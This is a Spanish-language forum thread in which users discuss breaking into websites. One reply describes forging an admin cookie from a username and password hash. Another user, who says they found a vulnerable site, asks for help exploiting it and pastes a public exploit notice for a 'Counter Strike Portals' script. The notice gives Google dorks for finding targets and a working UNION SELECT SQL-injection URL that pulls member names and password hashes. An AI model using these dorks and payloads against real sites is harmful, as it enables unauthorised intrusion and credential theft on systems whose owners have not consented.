Mensajes

averigua por buscar que hay una forma de insertarte como cookie con el nombre de usuario y el hash... se hace con un programa que logras modificar la cookie y cuando entras al panel de administacion ya estas logueado como admin si no esta mal el user y el hash!... espero que te sirva!
por cierto, que vulnerabilidad de joomla explotastes ?

Hola, estuve viendo en un sitio y me encontre con que contenia este bug "Counter Strike Portals download SQL Injection", estuve fijandome pero no encuentro la forma de explotarlo, encontre un exploit que andaba en la red pero no me termino de cerrar... espero a ver si alguno logra ayudarme gracias...
########################################################################
#

#

# COUNTER STRİque PORTALS(Kommentare zum Download)

#

########################################################################
#

#

# script download=http://www.phpwelt.de/scripte/Sonstiges/?PHPSESSID=3cfc7efaa4b2
a50e397b801526944fe6

#

# AUTHOR : S@BUN

#

#

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

########################################################################
#

#

# DORK 1 : allinurl: id mode=details "index.php?page=downloads"

#

# DORK 2 : allinurl: index.php?page=news "mode=comment"

#

DORK 3 : "Kommentare zum Download"

########################################################################
#

EXPLOIT :

index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,memb
er_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/*

########################################################################
#

# S@BUN i AM NOT HACKER S@BUN

########################################################################
#